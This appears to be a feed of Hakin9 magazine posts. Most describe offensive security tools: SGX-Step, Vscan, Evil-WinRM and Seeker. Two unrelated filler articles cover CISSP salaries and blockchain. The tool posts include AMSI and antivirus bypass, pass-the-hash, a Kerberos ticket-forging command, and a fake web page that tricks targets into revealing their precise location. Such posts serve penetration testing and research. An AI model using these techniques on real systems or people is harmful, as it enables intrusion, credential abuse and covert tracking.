SGX-Step is an open-source framework to facilitate side-channel attack research on Intel SGX platforms. SGX-Step consists of an adversarial Linux kernel driver and user space library that allow to configure untrusted page table entries and/or x86 APIC timer interrupts completely from user space. Our research results have demonstrated several new and improved enclaved execution attacks that gather side-channel observations at a maximal temporal resolution (i.e., by interrupting the victim enclave after every single instruction).

License. SGX-Step is free software, licensed under GPLv3. The SGX-Step logo is derived from Eadweard Muybridge's iconic public domain "Sallie Gardner at a Gallop" photo series, which, like our enclave single-stepping goal, breaks down the galloping horse dynamics into a series of individual photo frames to reveal overall horse gait properties.

Abstract

Trusted execution environments such as Intel SGX hold the promise of protecting sensitive computations from a potentially compromised operating system. Recent research convincingly demonstrated, however, that SGX's strengthened adversary model also gives rise to to a new class of powerful, low-noise side-channel attacks leveraging first-rate control over hardware. These attacks commonly rely on frequent enclave preemptions to obtain fine-grained side-channel observations. A maximal temporal resolution is achieved when the victim state is measured after every instruction. Current state-of-the-art enclave execution control schemes, however, do not generally achieve such instruction-level granularity.

This paper presents SGX-Step, an open-source Linux kernel framework that allows an untrusted host process to configure APIC timer interrupts and track page table entries directly from user space. We contribute and evaluate an improved approach to single-step enclaved execution at instruction-level granularity, and we show how SGX-Step enables several new or improved attacks. Finally, we discuss its implications for the design of effective defense mechanisms.

Jo Van Bulck, Frank Piessens, and Raoul Strackx. 2017. SGX-Step: A Practical Attack Framework for Precise Enclave Execution Control. In Proceedings of the 2nd Workshop on System Software for Trusted Execution (SysTEX '17).

Overview

Crucial to the design of SGX-Step, as opposed to previous enclave preemption proposals, is the creation of user-space virtual memory mappings for physical memory locations holding page table entries, as well as for the local APIC memory-mapped I/O configuration registers and the x86 Interrupt Descriptor Table (IDT). This allows an untrusted, attacker-controlled host process to easily (i) track or modify enclave page table entries, (ii) configure the APIC timer one-shot/periodic interrupt source, (iii) trigger inter-processor interrupts, and (iv) register custom interrupt handlers completely within user space.

The above figure summarizes the sequence of hardware and software steps when interrupting and resuming an SGX enclave through our framework.

1. The local APIC timer interrupt arrives within an enclaved instruction.
2. The processor executes the AEX procedure that securely stores execution context in the enclave’s SSA frame, initializes CPU registers, and vectors to the (user space) interrupt handler registered in the IDT.
3. At this point, any attack-specific, spy code can easily be plugged in.
4. The library returns to the user space AEP trampoline. We modified the untrusted runtime of the official SGX SDK to allow easy registration of a custom AEP stub. Furthermore, to enable precise evaluation of our approach on attacker-controlled benchmark debug enclaves, SGX-Step can optionally be instrumented to retrieve the stored instruction pointer from the interrupted enclave’s SSA frame. For this, our /dev/sgx-step driver offers an optional IOCTL call for the privileged EDBGRD instruction.
5. Thereafter, we configure the local APIC timer for the next interrupt by writing into the initial-count MMIO register, just before executing (6) ERESUME.

Building and Running

0. System Requirements

SGX-Step requires an SGX-capable Intel processor, and an off-the-shelf Linux kernel. Our evaluation was performed on i7-6500U/6700 CPUs, running Ubuntu 16.04 with a stock Linux 4.15.0 kernel. We summarize Linux kernel parameters below.

Pass the desired boot parameters to the kernel as follows:

$ sudo vim /etc/default/grub
 # GRUB_CMDLINE_LINUX_DEFAULT="quiet splash nox2apic iomem=relaxed no_timer_check isolcpus=1" 
$ sudo update-grub && sudo reboot

Finally, in order to reproduce our experimental results, make sure to disable C-States and SpeedStep technology in the BIOS configuration. The table below lists currently supported Intel CPUs, together with their single-stepping APIC timer interval (libsgxstep/config.h).

1. Patch and install SGX SDK

To enable easy registration of a custom Asynchronous Exit Pointer (AEP) stub, we modified the untrusted runtime of the official Intel SGX SDK. Proceed as follows to checkout linux-sgx v2.6 and apply our patches.

$ git submodule init 
$ git submodule update 
$ ./install_SGX_driver.sh # tested on Ubuntu 16.04 
$ ./patch_sdk.sh 
$ ./install_SGX_SDK.sh # tested on Ubuntu 16.04

The above install scripts are tested on Ubuntu 16.04 LTS. For other GNU/Linux distributions, please follow the instructions in the linux-sgx project to build and install the Intel SGX SDK and PSW packages. You will also need to build and load an (unmodified) linux-sgx-driver SGX kernel module in order to use SGX-Step.

Note (local installation). The patched SGX SDK and PSW packages can be installed locally, without affecting a compatible system-wide 'linux-sgx' installation. For this, the example Makefiles support an SGX_SDK environment variable that points to the local SDK installation directory. When detecting a non-default SDK path (i.e., not /opt/intel/sgxsdk), the "run" Makefile targets furthermore dynamically link against the patched libsgx_urts.so untrusted runtime built in the local linux-sgx directory (using the LD_LIBRARY_PATH environment variable).

Note (32-bit support). Instructions for building 32-bit versions of the SGX SDK and SGX-Step can be found in README-m32.md.

2. Build and load /dev/sgx-step

SGX-Step comes with a loadable kernel module that exports an IOCTL interface to the libsgxstep user-space library. The driver is mainly responsible for (i) hooking the APIC timer interrupt handler, (ii) collecting untrusted page table mappings, and optionally (iii) fetching the interrupted instruction pointer for benchmark enclaves.
To build and load the /dev/sgx-step driver, execute:

$ cd kernel 
$ make clean load

Note (/dev/isgx). Our driver uses some internal symbols and data structures from the official Intel /dev/isgx driver. We therefore include a git submodule that points to an unmodified v2.1 linux-sgx-driver.
Note (/dev/mem). We rely on Linux's virtual /dev/mem device to construct user-level virtual memory mappings for APIC physical memory-mapped I/O registers and page table entries of interest. Recent Linux distributions typically enable the CONFIG_STRICT_DEVMEM option which prevents such use, however. Our /dev/sgx-step driver therefore includes an approachto bypass devmem_is_allowed checks, without having to recompile the kernel.

3. Build and run test applications
User-space applications can link to the libsgxstep library to make use of SGX-Step's single-stepping and page table manipulation features. Have a look at the example applications in the "app" directory. For example, to build and run the strlen attack from the paper for a benchmark enclave that processes the secret string 100 repeated times, execute:

$ cd app/bench 
$ NUM=100 STRLEN=1 make parse # alternatively vary NUM and use BENCH=1 or ZIGZAG=1 
$ # (above command defaults to the Dell Inspiron 13 7359 evaluation laptop machine; 
$ # use DESKTOP=1 to build for a Dell Optiplex 7040 machine) 
$ # use SGX_SDK=/home/jo/sgxsdk/ for a local SDK installation 
$ # use M32=1 To produce a 32-bit executable

The above command builds libsgxstep, the benchmark victim enclave, and the untrusted attacker host process, where the attack scenario and instance size are configured via the corresponding environment variables. The same command also runs the resulting binary non-interactively (to ensure deterministic timer intervals), and finally calls an attack-specific post-processing Python script to parse the resulting enclave instruction pointer benchmark results.

Note (performance). Single-stepping enclaved execution incurs a substantial slowdown. We measured execution times of up to 15 minutes for the experiments described in the paper. SGX-Step's page table manipulation features allow to initiate single-stepping for selected functions only, for instance by revoking access rights on specific code or data pages of interest.

Note (timer interval). The exact timer interval value depends on CPU frequency, and hence remains inherently platform-specific. Configure a suitable value in /app/bench/main.c. We established precise timer intervals for our evaluation platforms (see table above) by tweaking and observing the NOP microbenchmark enclave instruction pointer trace results.

Using SGX-Step in your own projects

The easiest way to get started using the SGX-Step framwork in your own projects, is through git submodules:

$ cd my/git/project 
$ git submodule add git@github.com:jovanbulck/sgx-step.git 
$ cd sgx-step # Now build `/dev/sgx-step` and `libsgxstep` as described above

Have a look at the Makefiles in the app directory to see how a client application can link to libsgxstep plus any local SGX SDK/PSW packages.

Download the tool: https://github.com/jovanbulck/sgx-step

The post Sgx-Step - A Practical Attack Framework For Precise Enclave Execution Control appeared first on Hakin9 - IT Security Magazine.

Vscan puts an additional value into vulnerability scanning with nmap. It uses NSE scripts which can add flexibility in terms of vulnerability detection and exploitation. Below there are some of the features that NSE scripts provide:

• Network discovery
• More sophisticated version detection
• Vulnerability detection
• Backdoor detection
• Vulnerability exploitation

nmap (“Network Mapper”) is an open source tool for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine to scan single hosts. nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. While nmap is commonly used for security audits, many systems and network administrators find it useful for routine tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

The Nmap Scripting Engine (NSE) is one of Nmap’s most powerful and flexible features. It allows users to write (and share) simple scripts to automate a wide variety of networking tasks. Those scripts are then executed in parallel with the speed and efficiency you expect from Nmap. Users can rely on the growing and diverse set of scripts distributed with Nmap, or write their own to meet customer needs.

This tool uses the path /usr/share/nmap/scripts/ where the nse scripts are located in kali linux.

The tool performs the following:

• check the communication to the target hosts by cheking icmp requests
• takes as input a protocol name such as http and executes all nse scripts related to that protocol
• if any vulnerability triggers it saves the output into a log file
• it may perform all of the above actions for a range of IP addresses

If the tool finds a vulnerabilty in a certain protocol (e.g http) it keeps the output into a log file which is created and saved in the following location /home/vulnerabilities_enumeration/http_vulnerabilities/http_vulnerabilities/http_vulnerabilities.txt In this example the folders have been created using the protocol prefix which in the current occasion is the http protocol.

Usage:

[Usage:] ./vscan.sh <ip_range> <protocol> <port> <Pn (optional)>

[Usage:] ./vscan.sh <ips_file> <protocol> <port> <Pn (optional)>

[Usage:] ./vscan.sh <ip> <protocol> <port> <Pn (optional)>

How to run:

./vscan.sh 192.168.162.90 http 80

./vscan.sh 192.168.162.10-90 http 80

./vscan.sh 192.168.162.90 ssh 22 Pn

./vscan.sh IPs.txt smb 445

References:

• https://nmap.org/book/nse.html
• https://nmap.org/nsedoc/

Screenshots

Example: SMB scanning

Example: Slowloris vulnerability detection

Example: multiple IP scanning SSH weak keys

Example: When the system is down or no ICMP requests

Download tool and support author: https://github.com/xvass/vscan

The post Vscan - Vulnerability Scanner Tool Using Nmap And Nse Scripts appeared first on Hakin9 - IT Security Magazine.

The cost of living is only increasing year after year. Naturally, you would prefer your income to increase too, in alignment with your expenditure. This is possible only when you are in a good job., You are probably already in the IT field and earning well. Regardless, if you decide to step into the arena of cybersecurity, you will not regret it. In fact, you will have even less reason for regret should you enter with a Certified Information Systems Security Professional (CISSP) certificate in hand!

An Introduction to CISSP

CISSP is one of the several certifications offered to IT professionals. However, many organizations deem it the best certification for people seeking jobs in the arena of cybersecurity. This is because the International Information Systems Security Certification Consortium (ISC2) developed it. Furthermore, it is in alignment with the benchmark set by the International Organization for Standardization and International Electrotechnical Commission (IEC/ISO). This benchmark is Standard 17024. Every IT company across the globe recognizes and appreciates CISSP certification.

This certification will improve your knowledge and skills in eight broad areas. They are – 

• Identify and access management or IAM
• Security operations
• Software development security
• Asset security
• Security architecture and engineering
• Security assessment and testing
• Communications and network security
• Security and risk management

Once you have gone through the course, you are bound to have more confidence in your abilities to manage security operations. With hackers all over the virtual world, this is a major area of concern in every business establishment. However, with you at the helm of affairs, no one needs to worry. The design and architecture of your security programs are perfect. You manage them perfectly too! Any employer who hires you will commend you for being so vigilant!

Applying for the CISSP Certification Course

There are several establishments offering this certification course. However, if you wish to gain full advantage of the CISSP certification, you should seek a good institute. Is it easy to apply for CISSP certification? No, indeed, you have to fulfill certain requisites. For instance, you must display five years of cumulative work experience. Then again, you should have worked full time and been paid a regular salary. Thirdly, the work experience should have covered two domains included in the CISSP Common Book of Knowledge.

There are diverse ways of filling these requirements. For example, you may opt for a degree spanning four years of relevant study. Alternatively, you may peruse the ISC2 approve list of CISSP credentials. There are regional equivalents of these credentials. You may opt for a suitable equivalent. This will grant you comparable work experience of one year. Another method is to get through the basic CISSP examination. Once you get through, you can become an Associate of ISC2. As an Associate, you will have six years to gain five years of work experience. 

Obtaining the CISSP Certification

If you have the necessary requisites, then you may apply for CISSP certification. You will have access to study guides and practice books. You may even prepare for the final examination via practice tests. At the same time, you may prefer face-to-face training at a recognized institution, one of which we mentioned above. Of course, you will have to pay for your training. However, the course will be well worth your money and time.

Once you are ready, you will have to sit for a certification examination. It lasts for about three hours. The range of questions covers all eight domains. True, it is tough. However, the gain is immense if you pass the exam. You present yourself as an authority on crucial security issues and an expert on cybersecurity!

You may enjoy the fruits of certification for three years. After this period, you will have to go in for recertification. This means that you will have to display CPE credits. CPE refers to continuing professional education. Towards this end, you must strive to attend as many conferences as possible. If there are any training courses that will help you, do not hesitate to sign up. Learn as much as you can from webinars. Keep in touch with specialized media via your reading habits. This way, you will even be able to stay in touch with the latest trends in cybersecurity. In short, you will have to do something novel all the time. Apart from this, you will have to shell out a yearly membership fee too.

Getting a Huge Salary

The arena of cybersecurity is a lucrative one indeed! If you should decide to enter it, you may boast of earning one of the highest salaries in the world! The ordinary IT professional cannot even compare with you. There is always a difference between the wages of the ordinary individual and the expert. The percentage of difference varies for diverse places. They include African nations, Europe, the Asia-Pacific region, the Middle East, Latin America, and North America. 

Now imagine yourself gaining CISSP certification. You have it made for the rest of your life! Every IT professional will envy you! Your salary is the third-highest amongst all global salaries! Since it varies with experience and designations, it is not possible to list out exact figures. Rest assured, however, that the annual income runs into huge sums. In the U.S. alone, pay for CISSP certified individuals remains in the top 10 on the salary chart. In fact, it has been so for the past few years. It is no wonder then that so many IT professionals worldwide are keen to pursue CISSP certification. 

To conclude, opt for a cybersecurity certification whenever you get the chance to do so. Then again, select CISSP first. You are welcome to add other certifications later. Wherever you go, organizations will be keen to hire you. They believe that a CISSP-certified professional is the best person to handle vital issues relating to security.

About the Author:

Sai Digbijay is a content specialist for Cyber Security courses at Simplilearn. He writes about a range of topics that include data science, project management, cloud computing, and marketing. He values curious minds and scrambles to learn new things.

The post The Salary You Can Earn as CISSP Certified Professional by Sai Digbijay Patnaik appeared first on Hakin9 - IT Security Magazine.

Description & Purpose

This shell is the ultimate WinRM shell for hacking/pentesting.

WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.

This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.

Features

• Load in memory Powershell scripts
• Load in memory dll files bypassing some AVs
• Load in memory C# (C Sharp) assemblies bypassing some AVs
• Load x64 payloads generated with awesome donut technique
• AMSI Bypass
• Pass-the-hash support
• Kerberos auth support
• SSL and certificates support
• Upload and download files
• List remote machine services without privileges
• Command History
• WinRM command completion
• Local files completion
• Colorization on output messages (can be disabled optionally)
• Docker support (prebuilt images available at Dockerhub)

Help

Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] 
[-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] 
-S, --ssl                      Enable ssl 
-c, --pub-key                  PUBLIC_KEY_PATH Local path to public key certificate 
-k, --priv-key                 PRIVATE_KEY_PATH Local path to private key certificate 
-r, --realm                    DOMAIN Kerberos auth, it has to be set also in /etc/krb5.conf file using this format -> CONTOSO.COM = { kdc = fooserver.contoso.com } 
-s, --scripts                  PS_SCRIPTS_PATH Powershell scripts local path 
-e, --executables              EXES_PATH C# executables local path 
-i, --ip IP                    Remote host IP or hostname (required) 
-U, --url URL                  Remote url endpoint (default wsman) 
-u, --user                     USER Username (required if not using kerberos) 
-p, --password PASS            Password 
-H, --hash NTHash              NTHash 
-P, --port PORT                Remote host port (default 5985) 
-V, --version                  Show version 
-h, --help                     Display this help message

Requirements

Ruby 2.3 or higher is needed. Some ruby gems are needed as well: winrm >=2.3.2, winrm-fs >=1.3.2, stringio >=0.0.2 and colorize >=0.8.1. Depending of your installation method (3 availables) the installation of them could be required to be done manually.

Another important requirement only used for Kerberos auth is to install the Kerberos package used for network authentication. For some Linux like Debian based (Kali, Parrot, etc.) it is called krb5-user. For BlackArch it is called krb5 and probably it could be called in a different way for other Linux distributions.

Installation & Quick Start (4 methods)

Method 1. Installation directly as ruby gem (dependencies will be installed automatically on your system)

• Step 1. Install it (it will install automatically dependencies): gem install evil-winrm
• Step 2. Ready. Just launch it! ~$ evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

Method 2. Git clone and install dependencies on your system manually

• Step 1. Install dependencies manually: ~$ sudo gem install winrm winrm-fs colorize stringio
• Step 2. Clone the repo: git clone https://github.com/Hackplayers/evil-winrm.git
• Step 3. Ready. Just launch it! ~$ cd evil-winrm && ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

Method 3. Using bundler (dependencies will not be installed on your system, just to use evil-winrm)

• Step 1. Install bundler: gem install bundler:2.0.2
• Step 2. Install dependencies with bundler: cd evil-winrm && bundle install --path vendor/bundle
• Step 3. Launch it with bundler: bundle exec evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

Method 4. Using Docker

• Step 1. Launch docker container based on already built image: docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/ps1_scripts/' -e '/exe_files/'

Documentation

Clear text password

If you don't want to put the password in clear text, you can optionally avoid to set -p argument and the password will be prompted preventing to be shown.

Ipv6

To use IPv6, the address must be added to /etc/hosts. Just put the already set name of the host after -i argument instead of an IP address.

Basic commands

• upload: local files can be auto-completed using tab key.
  • usage: upload local_filename or upload local_filename destination_filename
• download:
  • usage: download remote_filename or download remote_filename destination_filename

Notes about paths (upload/download): Relative paths are not allowed to use on download/upload. Use filenames on current directory or absolute path. If you are using Evil-WinRM in a docker environment, bear in mind that all local paths should be at /data and be pretty sure that you mapped it as a volume in order to be able to access to downloaded files or to be able to upload files from your local host O.S.

• services: list all services. No administrator permissions needed.
• menu: load the Invoke-Binary, l04d3r-LoadDll, Donut-Loader and Bypass-4MSI functions that we will explain below. When a ps1 is loaded all its functions will be shown up.

Load powershell scripts

• To load a ps1 file you just have to type the name (auto-completion usnig tab allowed). The scripts must be in the path set at -s argument. Type menu again and see the loaded functions. Very large files can take a long time to be loaded.

Advanced commands

• Invoke-Binary: allows exes compiled from c# to be executed in memory. The name can be auto-completed using tab key and allows up to 3 parameters. The executables must be in the path set at -e argument.

• l04d3r-LoadDll: allows loading dll libraries in memory, it is equivalent to: [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("pwn.dll"))

The dll file can be hosted by smb, http or locally. Once it is loaded type menu, then it is possible to autocomplete all functions.

• Donut-Loader: allows to inject x64 payloads generated with awesome donut technique. No need to encode the payload.bin, just generate and inject!

You can use this donut-maker to generate the payload.bin if you don't use Windows. This script use a python module written by Marcello Salvati (byt3bl33d3r). It could be installed using pip:

pip3 install donut-shellcode

• Bypass-4MSI: patchs AMSI protection.

Kerberos

• First you have to sync date with the DC: rdate -n <dc_ip>
• To generate ticket there are many ways:
  • Using ticketer.py from impacket:ticketer.py -dc-ip <dc_ip> -nthash <krbtgt_nthash> -domain-sid <domain_sid> -domain <domain_name> <user>
  • If you get a kirbi ticket using Rubeus or Mimikatz you have to convert to ccache using ticket_converter.py:python ticket_converter.py ticket.kirbi ticket.ccache
• Add ccache ticket. There are 2 ways:export KRB5CCNAME=/foo/var/ticket.ccachecp ticket.ccache /tmp/krb5cc_0
• Add realm to /etc/krb5.conf (for linux). Use of this format is important:

CONTOSO.COM = {
            kdc = fooserver.contoso.con
}

• Check Kerberos tickets with klist
• To remove ticket use: kdestroy
• For more information about Kerberos check this cheatsheet

Extra features

• To disable colors just modify on code this variable $colors_enabled. Set it to false: $colors_enabled = false

Changelog:

Changelog and project changes can be checked here: CHANGELOG.md

Credits:

Main author:

• cybervaca

Collaborators, developers, documenters, testers and supporters:

• OscarAkaElvis
• jarilaos
• vis0r

Hat tip to:

• Alamot for his original code.
• 3v4Si0N for his awesome dll loader.
• WinRb All contributors of ruby library.
• TheWover for his awesome donut tool.
• byt3bl33d3r for his python library to create donut payloads.
• Sh11td0wn for inspiration about new features.

Download tool: https://github.com/Hackplayers/evil-winrm

The post Evil-WinRM: The ultimate WinRM shell for hacking/pentesting appeared first on Hakin9 - IT Security Magazine.

Concept behind Seeker is simple, just like we host phishing pages to get credentials why not host a fake page that requests your location like many popular location based websites.

Seeker Hosts a fake website on In Built PHP Server and uses Serveo to generate a link which we will forward to the target, website asks for Location Permission and if the target allows it, we can get :

• Longitude
• Latitude
• Accuracy
• Altitude - Not always available
• Direction - Only available if user is moving
• Speed - Only available if user is moving

Along with Location Information we also get Device Information without any permissions :

• Operating System
• Platform
• Number of CPU Cores
• Amount of RAM - Approximate Results
• Screen Resolution
• GPU information
• Browser Name and Version
• Public IP Address
• IP Address Reconnaissance

This tool is a Proof of Concept and is for Educational Purposes Only, Seeker shows what data a malicious website can gather about you and your devices and why you should not click on random links and allow critical permissions such as Location etc.

How is this Different from IP GeoLocation

• Other tools and services offer IP Geolocation which is NOT accurate at all and does not give location of the target instead it is the approximate location of the ISP.
• Seeker uses HTML API and gets Location Permission and then grabs Longitude and Latitude using GPS Hardware which is present in the device, so Seeker works best with Smartphones, if the GPS Hardware is not present, such as on a Laptop, Seeker fallbacks to IP Geolocation or it will look for Cached Coordinates.
• Generally if a user accepts location permsission, Accuracy of the information recieved is accurate to approximately 30 meters, Accuracy Depends on the Device.

Note : On iPhone due to some reason location accuracy is approximately 65 meters.

Tested On :

• Kali Linux 2019.2
• BlackArch Linux
• Ubuntu 19.04
• Kali Nethunter
• Termux
• Parrot OS

Installation

Kali Linux / Ubuntu / Parrot OS

git clone https://github.com/thewhiteh4t/seeker.git 
cd seeker/ 
chmod 777 install.sh 
./install.sh

BlackArch Linux

pacman -S seeker

Docker

# Install docker

curl -fsSL https://get.docker.com -o get-docker.sh
sh get-docker.sh

# Build Seeker

cd seeker/
docker build -t seeker .

# Launch seeker

docker run -t --rm seeker

# OR Pull from DockerHub

docker pull thewhiteh4t/seeker
docker run -t seeker

Termux

git clone https://github.com/thewhiteh4t/seeker.git
cd seeker/
chmod 777 termux_install.sh
./termux_install.sh

Usage

python3 seeker.py -h

usage: seeker.py [-h] [-s SUBDOMAIN]

optional arguments:
  -h, --help                              show this help message and exit
  -s SUBDOMAIN, --subdomain Subdomain    Provide Subdomain for Serveo URL ( Optional )
  -k KML, --kml KML                       Provide KML Filename ( Optional )
  -t TUNNEL, --tunnel TUNNEL              Specify Tunnel Mode [manual]

# Example

# SERVEO 
########
python3 seeker.py

# NGROK ETC.
############

# In First Terminal Start seeker in Manual mode like this
python3 seeker.py -t manual

# In Second Terminal Start Ngrok or any other tunnel service on port 8080
./ngrok http 8080

#-----------------------------------#

# Subdomain
########### 
python3 seeker.py --subdomain google
python3 seeker.py --   tunnel manual --subdomain zomato

Known Problems

• Services like Serveo and Ngrok are banned in some countries such as Russia etc., so if it's banned in your country you may not get a URL, if not then first READ CLOSED ISSUES, if your problem is not listed, create a new issue.

Tutorial

Download tool:

Twitter - Telegram - Blog - Github

The post Seeker - Accurately Locate Smartphones using Social Engineering appeared first on Hakin9 - IT Security Magazine.

We all have one common misconception about blockchain technology is that it is developed to power bitcoin. However, one can’t deny that this was its original purpose, apart from that blockchain is capable of so much more one could never imagine.

Blockchain is short form for a complete set of allocated ledger technologies that can be used to save and track anything of value, it may vary from financial transactions to medical records or even records of land. 

Let’s discuss why blockchain technology stands to revolutionize the way we communicate with each other.

1. The way it tracks and stores data

Blockchain stores the data in small sections, and theses are known as blocks, the blocks are linked together in a chronological manner to form an uninterrupted line. 

If you make any alteration or modification to the data recorded in a specific block, you can’t just rewrite it. Rather the altered data is recorded in a new block showing that x has modified to y at specific date and time. This is an not-destructive manner to take down the data alterations over time.

2. It creates trust in the data

Before a block can be added to the chain, a few things have to happen. Primarily, a cryptographic puzzle should be solved, thereby creating the block. The computer that finishes the puzzle forwards the answer to several other computers on the network, this is known as proof-of-work. 

The proof-of-work will be attested by the network, if it has no issues, the block will become a part of the chain. These math puzzles and verification process done by many computers guarantees that we can trust each and every block on the chain.

3. No more intermediaries

Currently, when doing business with one another, we don’t show the other person our financial or business records. Here, we depend on intermediaries whom we trust, like bank or attorney, to check our records and keep that data private. 

These intermediaries built trust between the parties and are able to verify. For example that “yes, Anne is the rightful owner of this land”. This method borders subjection and risk, but this adds an extra step to the exchange, by increasing the time and money we spent. If Anne’s land data was stored in a blockchain, she could flush down the middlemen, her lawyer. 

As we now know, all blocks added to the chain have been verified to be true and can’t be tampered with, so Anne can simply show Steve land title information directly. This would save time, money and eliminates middlemen.

Blockchain In Mobile Application Market

Blockchain technology is built on firm foundations and is tough and pliable. These attributes of this technology makes a huge impact in gaining the trust of people and it will be very useful for mobile app development.

The execution of blockchain technology in developing mobile applications gives advantages like transparent and flexibility, and also, it also helps in preventing frequent app crashes and server down issues.

To know more about this, check out the infographic developed on ‘Blockchain In Mobile Application Market’ by AC Market.

The post Blockchain In Mobile Application Market | Infographic by AC Market appeared first on Hakin9 - IT Security Magazine.

Sparrow-wifi has been built from the ground up to be the next generation 2.4 GHz and 5 GHz Wifi spectral awareness tool. At its most basic it provides a more comprehensive GUI-based replacement for tools like inSSIDer and linssid that runs specifically on linux. In its most comprehensive use cases, sparrow-wifi integrates wifi, software-defined radio (hackrf), advanced bluetooth tools (traditional and Ubertooth), traditional GPS (via gpsd), and drone/rover GPS via mavlink in one solution.

[NOTE: Check the Raspberry Pi section for updates. A setup script is now included to get the project running on Raspbian Stretch.]

Written entirely in Python3, Sparrow-wifi has been designed for the following scenarios:

• Basic wifi SSID identification
• Wifi source hunt - Switch from normal to hunt mode to get multiple samples per second and use the telemetry windows to track a wifi source
• 2.4 GHz and 5 GHz spectrum view - Overlay spectrums from Ubertooth (2.4 GHz) or HackRF (2.4 GHz and 5 GHz) in real time on top of the wifi spectrum (invaluable in poor connectivity troubleshooting when overlapping wifi doesn't seem to be the cause)
• Bluetooth identification - LE advertisement listening with standard bluetooth, full promiscuous mode in LE and classic bluetooth with Ubertooth
• Bluetooth source hunt - Track LE advertisement sources or iBeacons with the telemetry window
• iBeacon advertisement - Advertise your own iBeacons
• Remote operations - An agent is included that provides all of the GUI functionality via a remote agent the GUI can talk to.
• Drone/Rover operations - The agent can be run on systems such as a Raspberry Pi and flown on a drone (its made several flights on a Solo 3DR), or attached to a rover in either GUI-controlled or autonomous scan/record modes.
• The remote agent is JSON-based so it can be integrated with other applications
• Import/Export - Ability to import and export to/from CSV and JSON for easy integration and revisiualization. You can also just run 'iw dev scan' and save it to a file and import that as well.
• Produce Google maps when GPS coordinates are available for both discovered SSID's / bluetooth devices or to plot the wifi telemetry over time.

A few sample screenshots. The first is the main window showing a basic wifi scan, the second shows the telemetry/tracking window used for both Wifi and bluetooth tracking.

Installation

sparrow-wifi uses python3, qt5, and qtchart for the UI. On a standard debian variant you will may already have python3 and qt5 installed. The only addition to run it is qtchart. The following commands should get you up and running with wifi on both Ubuntu and Kali linux:

sudo apt-get install python3-pip gpsd gpsd-clients python3-tk python3-setuptools 
sudo pip3 install QScintilla PyQtChart gps3 dronekit manuf python-dateutil numpy matplotlib

Some folks have been running sparrow with a python virtualenv, if you'd like to run it in an isolated python environment, the following sequence should get you up and running:

git clone https://github.com/ghostop14/sparrow-wifi
cd sparrow-wifi
virtualenv --python=python3 $HOME/sparrow
source $HOME/sparrow/bin/activate
pip3 install gps3 python-dateutil requests pyqt5 pyqtchart numpy matplotlib
sudo python3 sparrow-wifi.py

NOTE: If you're trying to run on a Raspberry Pi, see the Raspberry Pi section below. Only the remote agent has been run on a Pi, some of the GUI components wouldn't install / set up on the ARM platform.

Running sparrow-wifi

Because it needs to use the standard command-line tool 'iw' for wifi scans, you will need to run sparrow-wifi as root. Simply run this from the cloned directory:

sudo ./sparrow-wifi.py

WiFi Notes

One item of note on wifi scanning, especially in the 5 GHz range is to find a card that works. It's not so much an issue with the 'iw' tool, however in more advanced configurations where monitoring mode is required, it can be an issue.

Bluetooth

For folks familiar with WiFi but 'new' to Bluetooth scanning, bluetooth is different enough that some of what you may want to see based on wifi won't be available (and may seem a bit frustrating at first). It all fundamentally comes down to how bluetooth operates. Bluetooth uses frequency hopping across the entire 2.4 GHz range, so it doesn't present in nice clean single channel buckets like wifi does. To complicate things there is a low energy (BTLE) and Classic mode that are incompatible from an RF perspective, so generally a bluetooth adapter can only scan for one type or the other at any given time.

Bluetooth devices are also generally only discoverable when advertising (think broadcasting broadcasting). The only other way to find bluetooth devices is with a device that can sniff all bluetooth packets out of the air, which standard bluetooth adapters don't do. Which is where hardware like an Ubertooth come in to get a better view of the bluetooth environment. And of course then if they're not transmitting you wouldn't have anything to go off of. And if you have to catch packets being transmitted you may need to scan/linger longer to see it, increasing scan frame rates to as long as 30 seconds to a minute.

So with all that said, with a standard / built-in bluetooth adapter, Sparrow-wifi can do advertisement scanning for bluetooth low energy (BTLE) devices. If they're advertising their transmit power, it'll attempt a range calculation. This what the latest iBeacon solutions and products do to be physically locatable. However with multi-pathing, internal walls, etc. don't expect an extreme level of accuracy. As an added bonus, sparrow-wifi can also advertise its own iBeacons for tracking (this could be useful from a remote agent to turn on location discovery). However not all bluetooth cards will advertise transmit power so you may not always get range. If you do have an Ubertooth, sparrow-wifi can use it for promiscuous discovery of both BTLE and classic bluetooth devices. Of course there's a tradeoff. Traditional LE scans update faster for tracking which is easier for bluetooth 'hunt', however promiscuous mode can identify more devices at the expense of needing to linger longer to listen.

If you would like to scan for bluetooth, you'll need a few things:

1. A bluetooth adapter (test with 'hcitool dev' to make sure it shows up). With an adapter you can do basic BTLE advertisement and iBeacon scans.
2. [Optional ] An Ubertooth for promiscuous discovery scans (BTLE and Classic Bluetooth)
   • Ubertooth tools installed and functioning (you can test it with ubertooth-specan-ui)
